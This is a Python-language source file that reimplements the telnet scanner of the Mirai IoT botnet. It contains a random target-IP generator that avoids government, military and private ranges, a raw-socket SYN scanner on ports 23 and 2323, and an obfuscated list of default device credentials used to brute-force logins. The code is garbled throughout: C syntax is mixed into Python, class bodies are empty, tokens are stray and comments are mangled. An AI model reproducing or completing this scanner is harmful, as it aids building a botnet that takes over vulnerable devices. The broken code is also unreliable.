def gip():
	while 1:
		max = 255
		ip1 = random.randint(0,max)
		ip2 = random.randint(0,max)
		ip3 = random.randint(0,max)
		ip4 = random.randint(0,max)
		if ip1 == 127 :
			continue

		if ip1 == 0 :
			continue

		if ip1 == 3 :
			continue

		if ip1 == 15 :
			continue

		if ip1 == 56 :
			continue

		if ip1 == 10 :
			continue

		if ip1 == 25 :
			continue

		if ip1 == 49 :
			continue

		if ip1 == 50 :
			continue

		if ip1 == 137 :
			continue

		# Department ipf Defense
		if ip1 == 6 :
			continue

		if ip1 == 7 :
			continue

		if ip1 == 11 :
			continue

		if ip1 == 21 :
			continue

		if ip1 == 22 :
			continue

		if ip1 == 26 :
			continue

		if ip1 == 28 :
			continue

		if ip1 == 29 :
			continue

		if ip1 == 30 :
			continue

		if ip1 == 33 :
			continue

		if ip1 == 55 :
			continue

		if ip1 == 214 :
			continue

		if ip1 == 215 :
			continue

		# End ipf Department ipf Defense
		if ip1 == 192 and ip2 == 168 :
			continue

		if ip1 == 146 and ip2 == 17 :
			continue

		if ip1 == 146 and ip2 == 80 :
			continue

		if ip1 == 146 and ip2 == 98 :
			continue

		if ip1 == 146 and ip2 == 154 :
			continue

		if ip1 == 147 and ip2 == 159 :
			continue

		if ip1 == 148 and ip2 == 114 :
			continue

		if ip1 == 150 and ip2 == 125 :
			continue

		if ip1 == 150 and ip2 == 133 :
			continue

		if ip1 == 150 and ip2 == 144 :
			continue

		if ip1 == 150 and ip2 == 149 :
			continue

		if ip1 == 150 and ip2 == 157 :
			continue

		if ip1 == 150 and ip2 == 184 :
			continue

		if ip1 == 150 and ip2 == 190 :
			continue

		if ip1 == 150 and ip2 == 196 :
			continue

		if ip1 == 152 and ip2 == 82 :
			continue

		if ip1 == 152 and ip2 == 229 :
			continue

		if ip1 == 157 and ip2 == 202 :
			continue

		if ip1 == 157 and ip2 == 217 :
			continue

		if ip1 == 161 and ip2 == 124 :
			continue

		if ip1 == 162 and ip2 == 32 :
			continue

		if ip1 == 155 and ip2 == 96 :
			continue

		if ip1 == 155 and ip2 == 149 :
			continue

		if ip1 == 155 and ip2 == 155 :
			continue

		if ip1 == 155 and ip2 == 178 :
			continue

		if ip1 == 164 and ip2 == 158 :
			continue

		if ip1 == 156 and ip2 == 9 :
			continue

		if ip1 == 167 and ip2 == 44 :
			continue

		if ip1 == 168 and ip2 == 68 :
			continue

		if ip1 == 168 and ip2 == 85 :
			continue

		if ip1 == 168 and ip2 == 102 :
			continue

		if ip1 == 203 and ip2 == 59 :
			continue

		if ip1 == 204 and ip2 == 34 :
			continue

		if ip1 == 207 and ip2 == 30 :
			continue

		if ip1 == 117 and ip2 == 55 :
			continue

		if ip1 == 117 and ip2 == 56 :
			continue

		if ip1 == 80 and ip2 == 235 :
			continue

		if ip1 == 207 and ip2 == 120 :
			continue

		if ip1 == 209 and ip2 == 35 :
			continue

		if ip1 == 64 and ip2 == 70 :
			continue

		if ip1 == 172 and ip2 >= 16 and ip2 < 32 :
			continue

		if ip1 == 100 and ip2 >= 64 and ip2 < 127 :
			continue

		if ip1 == 169 and ip2 > 254 :
			continue

		if ip1 == 198 and ip2 >= 18 and ip2 < 20 :
			continue

		if ip1 == 64 and ip2 >= 69 and ip2 < 227 :
			continue

		if ip1 == 128 and ip2 >= 35 and ip2 < 237 :
			continue

		if ip1 == 129 and ip2 >= 22 and ip2 < 255 :
			continue

		if ip1 == 130 and ip2 >= 40 and ip2 < 168 :
			continue

		if ip1 == 131 and ip2 >= 3 and ip2 < 251 :
			continue

		if ip1 == 132 and ip2 >= 3 and ip2 < 251 :
			continue

		if ip1 == 134 and ip2 >= 5 and ip2 < 235 :
			continue

		if ip1 == 136 and ip2 >= 177 and ip2 < 223 :
			continue

		if ip1 == 138 and ip2 >= 13 and ip2 < 194 :
			continue

		if ip1 == 139 and ip2 >= 31 and ip2 < 143 :
			continue

		if ip1 == 140 and ip2 >= 1 and ip2 < 203 :
			continue

		if ip1 == 143 and ip2 >= 45 and ip2 < 233 :
			continue

		if ip1 == 144 and ip2 >= 99 and ip2 < 253 :
			continue

		if ip1 == 146 and ip2 >= 165 and ip2 < 166 :
			continue

		if ip1 == 147 and ip2 >= 35 and ip2 < 43 :
			continue

		if ip1 == 147 and ip2 >= 103 and ip2 < 105 :
			continue

		if ip1 == 147 and ip2 >= 168 and ip2 < 170 :
			continue

		if ip1 == 147 and ip2 >= 198 and ip2 < 200 :
			continue

		if ip1 == 147 and ip2 >= 238 and ip2 < 255 :
			continue

		if ip1 == 150 and ip2 >= 113 and ip2 < 115 :
			continue

		if ip1 == 152 and ip2 >= 151 and ip2 < 155 :
			continue

		if ip1 == 153 and ip2 >= 21 and ip2 < 32 :
			continue

		if ip1 == 155 and ip2 >= 5 and ip2 < 10 :
			continue

		if ip1 == 155 and ip2 >= 74 and ip2 < 89 :
			continue

		if ip1 == 155 and ip2 >= 213 and ip2 < 222 :
			continue

		if ip1 == 157 and ip2 >= 150 and ip2 < 154 :
			continue

		if ip1 == 158 and ip2 >= 1 and ip2 < 21 :
			continue

		if ip1 == 158 and ip2 >= 235 and ip2 < 247 :
			continue

		if ip1 == 159 and ip2 >= 120 and ip2 < 121 :
			continue

		if ip1 == 160 and ip2 >= 132 and ip2 < 151 :
			continue

		if ip1 == 64 and ip2 >= 224 and ip2 < 227 :
			continue

		# CIA
		if ip1 == 162 and ip2 >= 45 and ip2 < 47 :
			continue

		# NASA Kennedy Space Center
		if ip1 == 163 and ip2 >= 205 and ip2 < 207:
			continue
		if ip1 == 164 and ip2 >= 45 and ip2 < 50 :
			continue
		if ip1 == 164 and ip2 >= 217 and ip2 < 233 :
			continue
		# FBI cipntriplled Linux servers & IPs/IP-Ranges
		if ip1 == 207 and ip2 >= 60 and ip2 < 62 :
			continue
		# Clipudflare
		if ip1 == 104 and ip2 >= 16 and ip2 < 31 :
			continue
		if ip1 == 193 and ip2 == 164 :
			continue
		if ip1 == 120 and ip2 >= 103 and ip2 < 108 :
			continue
		if ip1 == 188 and ip2 == 68:
			continue
		if ip1 == 78 and ip2 == 46:
			continue
		if ip1 >= 224:
			continue
		if (ip1 == 178 and ip2 == 128) or (ip1 == 123 and ip2 == 59):
			continue
		elif (ip1 == 124 and ip2 == 244 )or (ip1 == 178 and ip2 == 254 )or (ip1 == 185 and ip2 == 168 )or (ip1 == 178 and ip2 == 79):
			continue
		ip = str(ip1) + "." + str(ip2) + "." + str(ip3) + "." + str(ip4)
		returnimport os, socket, operator, sys

class scanner_auth(object):
    def __init__(self, username, password):
        self.username = username
        self.password = password
    @classmethod
    def from_input(cls):
        # Change this to automatically pick from a wordlist
        return cls(
            str(raw_input("Username: ")),
            str(raw_input("Password: "))
        )

class scanner_connection(object):
    def __init__(
        SC_CLOSED,
        SC_CONNECTING,
        SC_HANDLE_IACS,
        SC_WAITING_USERNAME,
        SC_WAITING_PASSWORD,
        SC_WAITING_PASSWD_RESP,
        SC_WAITING_ENABLE_RESP,
        SC_WAITING_SYSTEM_RESP,
        SC_WAITING_SHELL_RESP,
        SC_WAITING_SH_RESP,
        SC_WAITING_TOKEN_RESP
    ):
        self.SC_CLOSED, = SC_CLOSED,
        self.SC_CONNECTING, = SC_CONNECTING,
        self.SC_HANDLE_IACS, = SC_HANDLE_IACS,
        self.SC_WAITING_USERNAME, = SC_WAITING_USERNAME,
        self.SC_WAITING_PASSWORD, = SC_WAITING_PASSWORD,
        self.SC_WAITING_PASSWD_RESP, = SC_WAITING_PASSWD_RESP,
        self.SC_WAITING_ENABLE_RESP, = SC_WAITING_ENABLE_RESP,
        self.SC_WAITING_SYSTEM_RESP, = SC_WAITING_SYSTEM_RESP,
        self.SC_WAITING_SHELL_RESP, = SC_WAITING_SHELL_RESP,
        self.SC_WAITING_SH_RESP, = SC_WAITING_SH_RESP,
        self.SC_WAITING_TOKEN_RESP = SC_WAITING_TOKEN_RESP

def scanner_init():
    return

def scanner_kill():
    return

def setup_connection(scanner_connection):
    return

def get_random_ip(ipv4_t):
    return

def consume_iacs(scanner_connection):
    return

def consume_any_prompt(scanner_connection):
    return

def consume_user_prompt(scanner_connection):
    return

def consume_pass_prompt(scanner_connection):
    return

def consume_resp_prompt(scanner_connection):
    return

def add_auth_entry():
    return

scanner_auth(random_auth_entry)
def report_working(ipv4_t, scanner_auth):
    return

def recv_strip_null(sock, buf, len, flags):
    ret = recv(sock,buf,len,flags)
    if ret > 0:
        for i in ret:
            if buf[i] == 0x00:
                buf[i] = 'A'

    return ret

def scanner_init():
    i = 0
    source_port = 0

    class iphdr(iph):

    class tcphdr(tcph):

    scanner_pid = fork()
    if (scanner_pid > 0 or scanner_pid == -1):
        return

    local_addr = util_local_addr()

    rand_init()
    fake_time = time(NULL)
    conn = calloc(SCANNER_MAX_CONNS, len.scanner_connection)
    for i in SCANNER_MAX_CONNS:
        conn_table[i].state = SC_CLOSED
        conn_table[i].fd = -1
    rsck = socket.socket(AF_INET, SOCK_RAW, IPPROTO_TCP)
    if rsck == -1:
        print "[scanner] Failed to initialize raw socket, cannot scan\n"
    else:
        exit(0)
    fcntl(rsock, F_SETFL, O_NONBLOCK) | fcntl(rsck, F_GETFL, 0)
    i = 1
    a = setsockopt(rsck, IPPROTO_IP, IP_HDRINCL)
    if len.a != 0:
        print "[scanner] Failed to set IP_HDRINCL, cannot scan\n"
    else:
        close(rsck)
        exit(0)

    try:
        source_port = rand_next() & 0xffff
        while ntohs(source_port) < 1024:
            iph = iphdr(scanner_rawpkt)
            tcph = tcphdr(iph + 1)
            iph.ihl = 5
            iph.version = 4
            iph.tot_len = htons(len.iphdr + len.tcphdr)
            iph.id = rand_next()
            iph.ttl = 64
            iph.protocol = IPPROTO_TCP

            tcph.dest = htons(23)
            tcph.source = source_port
            tcph.doff = 5
            tcph.window = rand_next() & 0xffff
            tcph.syn = True
        # Set up passwords
            add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x41\x11\x17\x13\x13", 10);                     # root     xc3511
            add_auth_entry("\x50\x4D\x4D\x56", "\x54\x4B\x58\x5A\x54", 9);                          # root     vizxv
            add_auth_entry("\x50\x4D\x4D\x56", "\x43\x46\x4F\x4B\x4C", 8);                          # root     admin
            add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C", 7);                      # admin    admin
            add_auth_entry("\x50\x4D\x4D\x56", "\x1A\x1A\x1A\x1A\x1A\x1A", 6);                      # root     888888
            add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x4F\x4A\x46\x4B\x52\x41", 5);                  # root     xmhdipc
            add_auth_entry("\x50\x4D\x4D\x56", "\x46\x47\x44\x43\x57\x4E\x56", 5);                  # root     default
            add_auth_entry("\x50\x4D\x4D\x56", "\x48\x57\x43\x4C\x56\x47\x41\x4A", 5);              # root     juantech
            add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17\x14", 5);                      # root     123456
            add_auth_entry("\x50\x4D\x4D\x56", "\x17\x16\x11\x10\x13", 5);                          # root     54321
            add_auth_entry("\x51\x57\x52\x52\x4D\x50\x56", "\x51\x57\x52\x52\x4D\x50\x56", 5);      # support  support
            add_auth_entry("\x50\x4D\x4D\x56", "", 4);                                              # root     (none)
            add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x52\x43\x51\x51\x55\x4D\x50\x46", 4);          # admin    password
            add_auth_entry("\x50\x4D\x4D\x56", "\x50\x4D\x4D\x56", 4);                              # root     root
            add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17", 4);                          # root     12345
            add_auth_entry("\x57\x51\x47\x50", "\x57\x51\x47\x50", 3);                              # user     user
            add_auth_entry("\x43\x46\x4F\x4B\x4C", "", 3);                                          # admin    (none)
            add_auth_entry("\x50\x4D\x4D\x56", "\x52\x43\x51\x51", 3);                              # root     pass
            add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C\x13\x10\x11\x16", 3);      # admin    admin1234
            add_auth_entry("\x50\x4D\x4D\x56", "\x13\x13\x13\x13", 3);                              # root     1111
            add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x51\x4F\x41\x43\x46\x4F\x4B\x4C", 3);          # admin    smcadmin
            add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x13\x13\x13", 2);                          # admin    1111
            add_auth_entry("\x50\x4D\x4D\x56", "\x14\x14\x14\x14\x14\x14", 2);                      # root     666666
            add_auth_entry("\x50\x4D\x4D\x56", "\x52\x43\x51\x51\x55\x4D\x50\x46", 2);              # root     password
            add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16", 2);                              # root     1234
            add_auth_entry("\x50\x4D\x4D\x56", "\x49\x4E\x54\x13\x10\x11", 1);                      # root     klv123
            add_auth_entry("\x63\x46\x4F\x4B\x4C\x4B\x51\x56\x50\x43\x56\x4D\x50", "\x4F\x47\x4B\x4C\x51\x4F", 1); # Administrator admin
            add_auth_entry("\x51\x47\x50\x54\x4B\x41\x47", "\x51\x47\x50\x54\x4B\x41\x47", 1);      # service  service
            add_auth_entry("\x51\x57\x52\x47\x50\x54\x4B\x51\x4D\x50", "\x51\x57\x52\x47\x50\x54\x4B\x51\x4D\x50", 1); # supervisor supervisor
            add_auth_entry("\x45\x57\x47\x51\x56", "\x45\x57\x47\x51\x56", 1);                      # guest    guest
            add_auth_entry("\x45\x57\x47\x51\x56", "\x13\x10\x11\x16\x17", 1);                      # guest    12345
            add_auth_entry("\x45\x57\x47\x51\x56", "\x13\x10\x11\x16\x17", 1);                      # guest    12345
            add_auth_entry("\x43\x46\x4F\x4B\x4C\x13", "\x52\x43\x51\x51\x55\x4D\x50\x46", 1);      # admin1   password
            add_auth_entry("\x43\x46\x4F\x4B\x4C\x4B\x51\x56\x50\x43\x56\x4D\x50", "\x13\x10\x11\x16", 1); # administrator 1234
            add_auth_entry("\x14\x14\x14\x14\x14\x14", "\x14\x14\x14\x14\x14\x14", 1);              # 666666   666666
            add_auth_entry("\x1A\x1A\x1A\x1A\x1A\x1A", "\x1A\x1A\x1A\x1A\x1A\x1A", 1);              # 888888   888888
            add_auth_entry("\x57\x40\x4C\x56", "\x57\x40\x4C\x56", 1);                              # ubnt     ubnt
            add_auth_entry("\x50\x4D\x4D\x56", "\x49\x4E\x54\x13\x10\x11\x16", 1);                  # root     klv1234
            add_auth_entry("\x50\x4D\x4D\x56", "\x78\x56\x47\x17\x10\x13", 1);                      # root     Zte521
            add_auth_entry("\x50\x4D\x4D\x56", "\x4A\x4B\x11\x17\x13\x1A", 1);                      # root     hi3518
            add_auth_entry("\x50\x4D\x4D\x56", "\x48\x54\x40\x58\x46", 1);                          # root     jvbzd
            add_auth_entry("\x50\x4D\x4D\x56", "\x43\x4C\x49\x4D", 4);                              # root     anko
            add_auth_entry("\x50\x4D\x4D\x56", "\x58\x4E\x5A\x5A\x0C", 1);                          # root     zlxx.
            add_auth_entry("\x50\x4D\x4D\x56", "\x15\x57\x48\x6F\x49\x4D\x12\x54\x4B\x58\x5A\x54", 1); # root     7ujMko0vizxv
            add_auth_entry("\x50\x4D\x4D\x56", "\x15\x57\x48\x6F\x49\x4D\x12\x43\x46\x4F\x4B\x4C", 1); # root     7ujMko0admin
            add_auth_entry("\x50\x4D\x4D\x56", "\x51\x5B\x51\x56\x47\x4F", 1);                      # root     system
            add_auth_entry("\x50\x4D\x4D\x56", "\x4B\x49\x55\x40", 1);                              # root     ikwb
            add_auth_entry("\x50\x4D\x4D\x56", "\x46\x50\x47\x43\x4F\x40\x4D\x5A", 1);              # root     dreambox
            add_auth_entry("\x50\x4D\x4D\x56", "\x57\x51\x47\x50", 1);                              # root     user
            add_auth_entry("\x50\x4D\x4D\x56", "\x50\x47\x43\x4E\x56\x47\x49", 1);                  # root     realtek
            add_auth_entry("\x50\x4D\x4D\x56", "\x12\x12\x12\x12\x12\x12\x12\x12", 1);              # root     00000000
            add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x13\x13\x13\x13\x13\x13", 1);              # admin    1111111
            add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16", 1);                          # admin    1234
            add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16\x17", 1);                      # admin    12345
            add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x17\x16\x11\x10\x13", 1);                      # admin    54321
            add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16\x17\x14", 1);                  # admin    123456
            add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x15\x57\x48\x6F\x49\x4D\x12\x43\x46\x4F\x4B\x4C", 1); # admin    7ujMko0admin
            add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x16\x11\x10\x13", 1);                          # admin    1234
            add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x52\x43\x51\x51", 1);                          # admin    pass
            add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x4F\x47\x4B\x4C\x51\x4F", 1);                  # admin    meinsm
            add_auth_entry("\x56\x47\x41\x4A", "\x56\x47\x41\x4A", 1);                              # tech     tech
            add_auth_entry("\x4F\x4D\x56\x4A\x47\x50", "\x44\x57\x41\x49\x47\x50", 1);              # mother   fucker
            print "[scanner] Scanner process initialized. Scanning started.\n"
            while True:
                scanner_connection(conn)
                class timeval(tim):
                last_avail_conn = 0
                last_spew = 0
                mfd_rd = 0
                mfd_wr = 0
                nfds = ""

                if fake_time != last_spew:
                    last_spew = fake_time
                    for i in SCANNER_RAW_PPS:
                        sockaddr_in(paddr) = 0
                        iphdr(iph) = iphdr(scanner_rawpkt)
                        tcphdr(tcph) = tcphdr(iph + 1)
                        iph.id = rand_next()
                        iph.saddr = LOCAL_ADDR
                        iph.daddr = get_random_ip()
                        iph.check = 0
                        iph.check = checksum_generic(iph, len.iphdr)

                        if i % 10 == 0:
                            tcph.dest = htons(2323)
                        else:
                            tcph.dest = htons(23)
                        tcph.seq = iph.daddr
                        tcph.check = 0
                        tcph.check = checksump_tcpudp(iph, tcph, htons(tcphdr), len.tcphdr)
                        paddr.sin_family = AF_INET
                        paddr.sin_addr.s_addr = iph.daddr
                        paddr.sin_port = tcph.dest

                        sendto(rsck, scanner_rawpkt, len.scanner_rawpkt, MSG_NOSIGNAL, sockaddr(paddr), len.paddr)

                last_avail_conn = 0
                while True:
                    n = 0
                    dgram[1514] = ""
                    iphdr(iph) = iphdr(dgram)
                    tcphdr(tcph) = tcphdr(iph + 1)
                    scanner_connection(conn)
                    errno = 0
                    n = recvfrom(rsck, dgram, len.dgram, MSG_NOSIGNAL, NULL, NULL)
                    if n <= 0 or errno == "EAGAIN" or errno == "EWOULDBLOCK":
                        pass
                    if (n < (len.iphdr + len.tcphdr)):
                        return
                    if iph.daddr != LOCAL_ADDR:
                        return
                    if iph.protocol != IPPROTO_TCP:
                        return
                    if tcph.source != htons(23) and tcph.source != htons(2323):
                        return
                    if tcph.dest != source_port:
                        return
                    if tcph.syn == False:
                        return
                    if tcph.rst:
                        return
                    if tpch.fin:
                        return
                    if htonl(ntohl(tcph.ack_seq) - 1) != iph.saddr:
                        return

                    conn = NULL

                    with n = last_avail_conn
                        for n in SCANNER_MAX_CONNS:
                            if conn_table[n].state == SC_CLOSED:
                                conn = &conn_table[n]
                                last_avail_conn = n
                                pass
                    if conn == NULL:
                        pass
                    conn.dst_addr = iph.saddr
                    conn.dst_port = tcph.source
                    setup_connection(conn)
                    print "[scanner] FD{} Attempting to brute found IP {}.{}.{}.{}".format(
                        int(conn.fd),
                        int(iph.saddr & 0xff),
                        int(iph.saddr >> 8) & 0xff,
                        int(iph.saddr >> 16) & x0ff,
                        int(iph.saddr >> 24) & 0xff
                    )

    except Exception:
        FD_ZERO(&fdset_rd)
        FD_ZERO(&fdset_wr)
        for i in SCANNER_MAX_CONNS:
            timeout = int(0)
            conn = &conn_table[i]
            timeout = (conn.state > SC_CONNECTING ? 30 : 5)
            if conn.state != SC_CLOSED and fake_time - conn.last_recv > timeout:
                print "[scanner] FD{} timed out (state = {})\n".format(
                    int(conn.fd),
                    int(conn.state)
                )
        close(conn.fd)
        conn.fd = -1
        if conn.state > SC_HANDLE_IACS:
            if conn.tries + 1 == 10:
                conn.tries = 0
                conn.state = SC_CLOSED
            else:
                setup_connection(conn)
                print "[scanner] FD{} retrying with different auth combo!\n".format(
                    int(conn.fd)
                )
    return
deobf = str("")

can_consume = True COMBINE 
